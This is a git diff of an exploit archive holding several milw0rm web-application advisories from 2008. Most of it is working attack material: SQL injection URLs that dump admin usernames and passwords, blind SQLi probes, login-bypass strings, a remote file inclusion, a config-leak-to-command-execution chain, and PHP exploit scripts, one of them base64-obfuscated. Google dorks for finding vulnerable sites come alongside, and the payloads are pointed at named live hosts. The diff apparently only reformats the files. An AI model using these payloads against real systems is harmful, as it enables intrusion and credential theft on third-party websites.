+                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
+                =                                                                                    =
+                =        Sript Demo:http://www.phpstore.info/product_info.php?products_id=163        =
+                =                                                                                    =
+                =                               www.phpstore.info                                    =              
+                 =================================== Snakespc ======================================    
+
+
+Exploit:
+
+http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	 
+
+Demo :
+
+http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	
+                                                                      
+===================================================================================================================
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/SC >>>> Members 
+str0ke.....>>>>.....milw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-16]
diff --git a/platforms/php/webapps/7133.txt b/platforms/php/webapps/7133.txt
index a4385ab4b..532999f47 100755
--- a/platforms/php/webapps/7133.txt
+++ b/platforms/php/webapps/7133.txt
@@ -1,32 +1,32 @@
-===========================================================================================
-[-] Title    : Multiple SQL Injection Vulnerability
-[-] Software : Flosites Blog
-[-] Vendor   : www.flosites.com
-[-] Date     : 17 November 2008 (Indonesia)
-[-] Author   : Vrs-hCk
-[-] Contact  : d00r[at]telkom.net
-[-] Blog     : http://c0li.blogspot.com/
-===========================================================================================
-
-[+] Google Dork
-
-    "blog by flosites"
-
-[+] Exploit
-
-    http://[site]/[path]/index.php?cat=-1 [SQL]/*
-    http://[site]/[path]/index.php?category=-1 [SQL]/*
-
-[+] Proof of Concept
-
-    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
-    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*
-
-===========================================================================================
-[-] Greetz   : 
-    www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
-    Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
-    Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
-===========================================================================================
-
-# milw0rm.com [2008-11-16]
+===========================================================================================
+[-] Title    : Multiple SQL Injection Vulnerability
+[-] Software : Flosites Blog
+[-] Vendor   : www.flosites.com
+[-] Date     : 17 November 2008 (Indonesia)
+[-] Author   : Vrs-hCk
+[-] Contact  : d00r[at]telkom.net
+[-] Blog     : http://c0li.blogspot.com/
+===========================================================================================
+
+[+] Google Dork
+
+    "blog by flosites"
+
+[+] Exploit
+
+    http://[site]/[path]/index.php?cat=-1 [SQL]/*
+    http://[site]/[path]/index.php?category=-1 [SQL]/*
+
+[+] Proof of Concept
+
+    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
+    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*
+
+===========================================================================================
+[-] Greetz   : 
+    www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
+    Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
+    Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
+===========================================================================================
+
+# milw0rm.com [2008-11-16]
diff --git a/platforms/php/webapps/7134.txt b/platforms/php/webapps/7134.txt
index 6972b25ef..1f1c9dca2 100755
--- a/platforms/php/webapps/7134.txt
+++ b/platforms/php/webapps/7134.txt
@@ -1,50 +1,50 @@
-|___________________________________________________
-|
-| Wholesale ( track.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85@Yahoo.com
-|
-|___________________________________________________
-|
-| script :  http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162
-|
-| DorK   : inurl:"track.php?id="
-|___________________________________________________
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--
-
-
-
-Demo
-________
-
-http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ |  IRAQ_JAGUR | Cyber-Zone | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | CraCkEr |  G4N0K
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-16]
+|___________________________________________________
+|
+| Wholesale ( track.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85@Yahoo.com
+|
+|___________________________________________________
+|
+| script :  http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162
+|
+| DorK   : inurl:"track.php?id="
+|___________________________________________________
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--
+
+
+
+Demo
+________
+
+http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ |  IRAQ_JAGUR | Cyber-Zone | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | CraCkEr |  G4N0K
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-16]
diff --git a/platforms/php/webapps/7136.txt b/platforms/php/webapps/7136.txt
index b8a144cbf..f6256ac22 100755
--- a/platforms/php/webapps/7136.txt
+++ b/platforms/php/webapps/7136.txt
@@ -1,36 +1,36 @@
-************************(Bypass Config Download Vulnerability)*****************
-
-script: mxcamarchive 2.2
-                   
-***************************************************************************
-download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip  
-                                                                                                         
-***************************************************************************
-...........................................................................
-expl:
-                                                     
-http://site.com/path/archive/config.ini
-
-and login
-http://site.com/path/admin
-
-
-and add new web cam
-and Description   '
    '
-and save
-
-
-now:
-http://site.com/path/index.php?h=ls -la
-
-***************************************************
-***************************************************
-
-Author: ahmadbady  from http://www.deltahacking.net
-
-my mail: kivi_hacker666@yahoo.com
-
-
-***************************************************
-
-# milw0rm.com [2008-11-17]
+************************(Bypass Config Download Vulnerability)*****************
+
+script: mxcamarchive 2.2
+                   
+***************************************************************************
+download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip  
+                                                                                                         
+***************************************************************************
+...........................................................................
+expl:
+                                                     
+http://site.com/path/archive/config.ini
+
+and login
+http://site.com/path/admin
+
+
+and add new web cam
+and Description   '
    '
+and save
+
+
+now:
+http://site.com/path/index.php?h=ls -la
+
+***************************************************
+***************************************************
+
+Author: ahmadbady  from http://www.deltahacking.net
+
+my mail: kivi_hacker666@yahoo.com
+
+
+***************************************************
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7138.txt b/platforms/php/webapps/7138.txt
index 0642e5777..859dfa4a8 100755
--- a/platforms/php/webapps/7138.txt
+++ b/platforms/php/webapps/7138.txt
@@ -1,37 +1,37 @@
-E-topbiz  AdManager 4 (group)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script  : http://e-topbiz.com/oprema/pages/admanager4.php
-
-Demo :
-_______
-true & false
-
-http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4
-http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5
-
-Version = 4  :) 
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-17]
+E-topbiz  AdManager 4 (group)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script  : http://e-topbiz.com/oprema/pages/admanager4.php
+
+Demo :
+_______
+true & false
+
+http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4
+http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5
+
+Version = 4  :) 
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7140.txt b/platforms/php/webapps/7140.txt
index 88c506fb3..b0535fcfb 100755
--- a/platforms/php/webapps/7140.txt
+++ b/platforms/php/webapps/7140.txt
@@ -1,27 +1,27 @@
-\r\n\r\n", $argv[0]) and exit;
-
-$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
-	? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
-
-printf("[~] %s \r\n\r\n", $out);
-
-?>
-
-# milw0rm.com [2008-11-17]
+\r\n\r\n", $argv[0]) and exit;
+
+$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
+	? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
+
+printf("[~] %s \r\n\r\n", $out);
+
+?>
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7143.txt b/platforms/php/webapps/7143.txt
index 4378a6999..82bc409d3 100755
--- a/platforms/php/webapps/7143.txt
+++ b/platforms/php/webapps/7143.txt
@@ -1,32 +1,32 @@
-************************(remote file include)*****************
-
-script: phpfan 3.3.4
-   
-***************************************************************************
-download from:http://ishallnotcare.org/mint/pepper/tillkruess/downloads/tracker.php?url=http%3A//scriptsextra.ishallnotcare.org/phpfanbasic334.zip 
-   
-***************************************************************************
-............................................................................
-vul:
- include_once $includepath .'/debug.php';
-   
-xpl:
-   
-http://site.com/path/includes/init.php?includepath=shell?
-
-***************************************************
-***************************************************
-
-Author: ahmadbady from http://www.deltahacking.net
-
-my mail: kivi_hacker666@yahoo.com
-
-
-***************************************************
-
-# milw0rm.com [2008-11-17]
+************************(remote file include)*****************
+
+script: phpfan 3.3.4
+   
+***************************************************************************
+download from:http://ishallnotcare.org/mint/pepper/tillkruess/downloads/tracker.php?url=http%3A//scriptsextra.ishallnotcare.org/phpfanbasic334.zip 
+   
+***************************************************************************
+............................................................................
+vul:
+ include_once $includepath .'/debug.php';
+   
+xpl:
+   
+http://site.com/path/includes/init.php?includepath=shell?
+
+***************************************************
+***************************************************
+
+Author: ahmadbady from http://www.deltahacking.net
+
+my mail: kivi_hacker666@yahoo.com
+
+
+***************************************************
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7144.txt b/platforms/php/webapps/7144.txt
index f36ff043c..13ccf0f27 100755
--- a/platforms/php/webapps/7144.txt
+++ b/platforms/php/webapps/7144.txt
@@ -1,37 +1,37 @@
-[~] powered by Jadu® Galaxies blind sql inj
-[~]
-[~] documents.php (categoryID) blind sql inj
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 17.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 45
-[~]
-[~] my target bug number: 100
-[~]
-[~] N0T: a.q bide kpss calIscaktIm : ( (
-[~]
-[~] -----------------------------------------------------------
-
-exploit for demo:
-
-http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
-
-http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-17]
+[~] powered by Jadu® Galaxies blind sql inj
+[~]
+[~] documents.php (categoryID) blind sql inj
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 17.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 45
+[~]
+[~] my target bug number: 100
+[~]
+[~] N0T: a.q bide kpss calIscaktIm : ( (
+[~]
+[~] -----------------------------------------------------------
+
+exploit for demo:
+
+http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
+
+http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7146.txt b/platforms/php/webapps/7146.txt
index 08a14f205..1e3f555f7 100755
--- a/platforms/php/webapps/7146.txt
+++ b/platforms/php/webapps/7146.txt
@@ -1,20 +1,20 @@
-###############################################################################################
-[-] Simple Customer  1.2 Remort (Auth bypass) SQL Injection Vulnerability
-[-] Discovered By : d3b4g        
-[-] Greetz : All my freind         
-################################################################################################
- Go to www.target.com[path]login.php
-
- Use following information to bypass login.
-
- Write any email Address as email address.It must to be in email format like somethin@something.com
-
- For exapmple letmein@inbox.com
-
- For password use ' or ' 1=1
-
-  Live demo [at] http://www.simplecustomer.com/demo/login.php
---------------------------------------------
---------------------------------------------
-
-# milw0rm.com [2008-11-17]
+###############################################################################################
+[-] Simple Customer  1.2 Remort (Auth bypass) SQL Injection Vulnerability
+[-] Discovered By : d3b4g        
+[-] Greetz : All my freind         
+################################################################################################
+ Go to www.target.com[path]login.php
+
+ Use following information to bypass login.
+
+ Write any email Address as email address.It must to be in email format like somethin@something.com
+
+ For exapmple letmein@inbox.com
+
+ For password use ' or ' 1=1
+
+  Live demo [at] http://www.simplecustomer.com/demo/login.php
+--------------------------------------------
+--------------------------------------------
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7147.txt b/platforms/php/webapps/7147.txt
index 690c04379..2b99b3778 100755
--- a/platforms/php/webapps/7147.txt
+++ b/platforms/php/webapps/7147.txt
@@ -1,54 +1,54 @@
-SaturnCMS (view)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
-
-Mail :  darkangel_G85@yahoo.com
-
-___________________________________
-
-script  : http://www.saturncms.com/download
-
-Demo :
-_______
-
-http://demo.saturncms.com/gallery/web/view/22`
-
-true & false
-
-http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=5
-http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=4
-Version = 5  :) 
-Table
-http://demo.saturncms.com/gallery/web/view/22+and+(SELECT 1 from mysql.user limit 0,1)=1
-
-
-Auth Bypass
-_______
-
-http://demo.saturncms.com/admin
-Username : admin ' or 1=1
-
-Password : milw0rm
-
-
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-                             IM IraQi    |       IM TrYaGI 
-
-# milw0rm.com [2008-11-17]
+SaturnCMS (view)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
+
+Mail :  darkangel_G85@yahoo.com
+
+___________________________________
+
+script  : http://www.saturncms.com/download
+
+Demo :
+_______
+
+http://demo.saturncms.com/gallery/web/view/22`
+
+true & false
+
+http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=5
+http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=4
+Version = 5  :) 
+Table
+http://demo.saturncms.com/gallery/web/view/22+and+(SELECT 1 from mysql.user limit 0,1)=1
+
+
+Auth Bypass
+_______
+
+http://demo.saturncms.com/admin
+Username : admin ' or 1=1
+
+Password : milw0rm
+
+
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+                             IM IraQi    |       IM TrYaGI 
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7148.txt b/platforms/php/webapps/7148.txt
index a1ffa3684..24c70a515 100755
--- a/platforms/php/webapps/7148.txt
+++ b/platforms/php/webapps/7148.txt
@@ -1,49 +1,49 @@
-			
-				                     #########
-				                   #############
-				                 #################
-				               ####################
-				              ####`   `####`   `####
-				             #####|||        |||#####
-				            ######|||        |||######
-				           #######||| ||##|| |||#######
-				           #######||||||##||||||#######
- 				           ############################
- 				            ###########################
-        				      ######+++++++++++######
-            				          #++++++++++++#
-   				               ___#++++++++++++#
-      				             _|   #++++++++++++|___
-       				            |        ++++++++      |
-      				            |_          ++        _|
-         				      |_________+________|
-########################################################################################################
-#                         Ultrastats exploit by  eeee eeee e   e                                       #
-#                         -------------------->  8    8    8   8                                       # 
-#                                                8eee 8eee 8eee8e                                      #
-#                                                88   88   88   8                                      #
-#                                                88ee 88ee 88   8 ---> mail: hexdez@nm.ru              #
-########################################################################################################
-#                                                -> Greetz to:                                         #
-#             th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt                 #
-########################################################################################################
-#                                  -> Ultrastats all Versions?! Sql Injection                          #
-#                                        (Version 0.3.11 & 0.2.144 tested)                             #
-########################################################################################################
-#                                      -> Dork: inurl:"index.php?serverid="                            #
-########################################################################################################
-#                                                  -> Injection:                                       #
-# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
-#                                              and watch the Source  ;)                                #
-#                                                                                                      #
-#                                                 -> Example:                                          #
-# -> v.  0.3.11:                                                                                       #
-#                                                                                                      ##
-# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
-#
-# -> v. 0.2.144: 
-#
-# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
-##
-
-# milw0rm.com [2008-11-17]
+			
+				                     #########
+				                   #############
+				                 #################
+				               ####################
+				              ####`   `####`   `####
+				             #####|||        |||#####
+				            ######|||        |||######
+				           #######||| ||##|| |||#######
+				           #######||||||##||||||#######
+ 				           ############################
+ 				            ###########################
+        				      ######+++++++++++######
+            				          #++++++++++++#
+   				               ___#++++++++++++#
+      				             _|   #++++++++++++|___
+       				            |        ++++++++      |
+      				            |_          ++        _|
+         				      |_________+________|
+########################################################################################################
+#                         Ultrastats exploit by  eeee eeee e   e                                       #
+#                         -------------------->  8    8    8   8                                       # 
+#                                                8eee 8eee 8eee8e                                      #
+#                                                88   88   88   8                                      #
+#                                                88ee 88ee 88   8 ---> mail: hexdez@nm.ru              #
+########################################################################################################
+#                                                -> Greetz to:                                         #
+#             th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt                 #
+########################################################################################################
+#                                  -> Ultrastats all Versions?! Sql Injection                          #
+#                                        (Version 0.3.11 & 0.2.144 tested)                             #
+########################################################################################################
+#                                      -> Dork: inurl:"index.php?serverid="                            #
+########################################################################################################
+#                                                  -> Injection:                                       #
+# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
+#                                              and watch the Source  ;)                                #
+#                                                                                                      #
+#                                                 -> Example:                                          #
+# -> v.  0.3.11:                                                                                       #
+#                                                                                                      ##
+# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
+#
+# -> v. 0.2.144: 
+#
+# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
+##
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7149.php b/platforms/php/webapps/7149.php
index 2e3096284..1b8204066 100755
--- a/platforms/php/webapps/7149.php
+++ b/platforms/php/webapps/7149.php
@@ -1,128 +1,128 @@
- ]
-
-
-	===[ XPL ]===
-																					*/
-
-error_reporting(E_ALL);
-   $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg".
-			"ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg".
-			"ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg".
-			"ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN".
-			"CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg".
-			"IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg".
-			"XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg".
-			"ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg".
-			"ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg".
-			"ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg".
-			"ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog".
-			"ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc".
-			"IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8".
-			"X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg".
-			"QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF".
-			"T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u".
-			"PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8".
-			"PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw".
-			"YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk".
-			"YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6".
-			"IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi".
-			"c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
-			"c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls".
-			"ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48".
-			"YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h".
-			"cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw".
-			"dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg".
-			"dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFAg".
-			"c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg".
-			"OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N".
-			"Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0".
-			"OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+".
-			"DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg".
-			"bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog".
-			"bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti".
-			"b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu".
-			"YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg".
-			"ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz".
-			"c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl".
-			"dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU".
-			"WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn".
-			"bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg".
-			"Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc".
-			"bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX".
-			"aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw".
